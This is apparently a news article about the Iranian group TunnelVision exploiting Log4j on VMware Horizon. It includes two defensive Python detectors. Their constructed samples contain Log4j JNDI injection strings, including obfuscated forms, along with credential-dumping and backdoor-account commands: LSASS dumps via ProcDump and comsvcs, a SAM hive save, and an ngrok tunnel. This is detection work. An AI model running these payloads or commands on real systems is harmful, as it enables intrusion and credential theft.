State-Sponsored Iranian Hackers Deploy Log4j Security Flaw to Infect Unpatched VMware Users With Ransomware


The Log4j vulnerability has surfaced again in compromised systems, this time after state-sponsored hackers from Iran reportedly attacked VMware users.

According to cybersecurity analysts, the notorious group behind this attack is TunnelVision.

TunnelVision Exploits Log4J Flaw 

Cybersecurity researchers said that the Iranian hacking group attacked VMware servers in the latest exploitation of the Log4j security flaw.

According to a comprehensive report by SentinelLabs on Thursday, Feb. 17, the flaw in the Java-based logging utility Log4j drew wide attention once attackers began exploiting it.

Since then, attackers have managed to gain access to thousands of apps by relying on remote code execution. At its peak, it was one of the most dreaded exploits on the internet, and experts believe it will continue to haunt users for the next few years.

The group, tracked as TunnelVision, is currently focused on infecting VMware Horizon, a virtualization product whose desktop clients run on Windows, Linux, and macOS.

According to Yair Rigevsky and Amitai Ben Shushan Ehrlich from SentinelOne, the Iranian cybercriminals have been active in compromising VMware servers by deploying backdoors and collecting sensitive information from the victims.

On top of that, they also run PowerShell commands and create backdoor users. The intrusion begins with exploitation of the Log4j flaw, after which the attackers run commands through PowerShell reverse shells spawned by the Tomcat process.

VMware typically uses Apache Tomcat to deploy its Java web applications. From this server, the TunnelVision hackers were able to remotely control the victims' networks.
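The Log4j entry point described above leaves a trace in the web server's own logs: the malicious lookup string has to arrive in a logged field (a User-Agent header, a query parameter). The script below is an added defensive example, not code from the article or from SentinelLabs; it scans constructed Apache-style access log lines for JNDI lookup strings, URL-decoding them and flattening the common nested-lookup and default-value forms before matching, so that a trivially disguised lookup is still reported. The log lines, addresses and paths are all constructed for the example.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample access log lines (not real traffic). Line 1 is benign;
# lines 2-4 carry a JNDI lookup in the User-Agent or the query string.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [17/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [17/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.10/b}"',
    '10.0.0.9 - - [17/Feb/2022:10:01:11 +0000] "GET /portal/?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# ${lower:j} / ${upper:j} evaluate to the single wrapped character.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
# ${somekey:-j} evaluates to the default "j" when the key is unset.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]{0,16}?:-([^{}])\}")
# What a lookup looks like once the disguises are flattened.
_JNDI = re.compile(r"\$\{jndi:([a-z0-9]+):")


def normalize(text: str) -> str:
    """URL-decode and flatten nested/default lookups until nothing changes."""
    text = urllib.parse.unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
    return text.lower()


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that contains a JNDI lookup after normalization."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize(raw)
        match = _JNDI.search(normalized)
        if match:
            findings.append({
                "line": number,
                "scheme": match.group(1),   # ldap, rmi, dns, ...
                "raw": raw,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: jndi lookup via {finding['scheme']}")
```

Matching on normalized text catches the three constructed variants, but this is a signature, not a fix: Log4j's lookup syntax allows many more encodings, so a hit should trigger a check that the affected Horizon and Tomcat instances are patched and that no unexpected child processes of the Tomcat service exist.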


What Iranian Hackers Do After Installing PowerShell

According to another report by Ars Technica, here’s what the TunnelVision group does after finishing the setup.

  • Creates a backdoor user and adds it to the network admin group.

  • Executes reconnaissance commands.

  • Uses ProcDump, comsvcs MiniDump, and SAM hive dumps for data collection.

  • Installs Ngrok…
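Every step in that list produces process-creation telemetry, and the sequence (a shell spawned by the Tomcat service, then account creation, credential dumping and a tunnelling tool) is far more distinctive than any single event. The script below is an added example written for this article, not SentinelLabs' or VMware's own detection logic; it runs a small set of rules over constructed Sysmon-style process events. The Tomcat service binary names, the account name and every path are assumptions made for the example.

```python
import ntpath
import re
from typing import Callable, Dict, List, Tuple

# Assumed binary names for the Horizon Tomcat service and for shells it should never spawn.
TOMCAT_BINARIES = {"ws_tomcatservice.exe", "tomcat9.exe", "tomcat8.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (not real telemetry). Events 1-7 mirror
# the steps listed in the article; events 8 and 9 are ordinary activity.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "parent_image": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "image": PS, "command_line": "powershell.exe -nop -w hidden -c <constructed>"},
    {"id": 2, "parent_image": PS, "image": r"C:\Windows\System32\net.exe",
     "command_line": "net user svc_backup <constructed> /add"},
    {"id": 3, "parent_image": PS, "image": r"C:\Windows\System32\net.exe",
     "command_line": "net localgroup administrators svc_backup /add"},
    {"id": 4, "parent_image": PS, "image": r"C:\temp\procdump.exe",
     "command_line": "procdump.exe -ma lsass.exe out.dmp"},
    {"id": 5, "parent_image": PS, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"},
    {"id": 6, "parent_image": PS, "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg save HKLM\SAM C:\temp\sam.hiv"},
    {"id": 7, "parent_image": PS, "image": r"C:\temp\ngrok.exe",
     "command_line": "ngrok.exe tcp 3389"},
    {"id": 8, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe Get-Date"},
    {"id": 9, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
]


def _base(path: object) -> str:
    return ntpath.basename(str(path)).lower()


def _cmd(event: Dict[str, object]) -> str:
    return str(event["command_line"]).lower()


# Each rule: (name, predicate over one event).
RULES: List[Tuple[str, Callable[[Dict[str, object]], bool]]] = [
    ("tomcat_spawns_shell",
     lambda e: _base(e["parent_image"]) in TOMCAT_BINARIES and _base(e["image"]) in SHELLS),
    ("backdoor_user_created",
     lambda e: re.search(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", _cmd(e)) is not None),
    ("user_added_to_admins",
     lambda e: re.search(r"\bnet1?(\.exe)?\s+(localgroup|group)\s+\"?(administrators|domain admins)\"?\s+\S+\s+/add\b", _cmd(e)) is not None),
    ("lsass_dump_procdump",
     lambda e: re.search(r"procdump.*lsass", _cmd(e)) is not None),
    ("lsass_dump_comsvcs",
     lambda e: re.search(r"comsvcs(\.dll)?,?\s*minidump", _cmd(e)) is not None),
    ("sam_hive_dump",
     lambda e: re.search(r"\breg(\.exe)?\s+save\s+hklm\\sam\b", _cmd(e)) is not None),
    ("ngrok_tunnel",
     lambda e: _base(e["image"]) == "ngrok.exe"),
]


def detect(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Return (event id, rule name) for every rule that fires on an event."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((int(event["id"]), name))
    return hits


def severity(hits: List[Tuple[int, str]]) -> str:
    """Escalate when several distinct stages of the chain are seen together."""
    distinct = {name for _, name in hits}
    if "tomcat_spawns_shell" in distinct and len(distinct) >= 3:
        return "high"
    if distinct:
        return "medium"
    return "none"


if __name__ == "__main__":
    results = detect(SAMPLE_EVENTS)
    for event_id, rule in results:
        print(f"event {event_id}: {rule}")
    print("severity:", severity(results))
```

The individual rules are noisy on their own (administrators do run `net user /add`), which is why `severity` only escalates when a shell under the Tomcat service is seen alongside at least two further stages; in practice the events would also be correlated by host and parent process tree rather than treated as a flat list.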
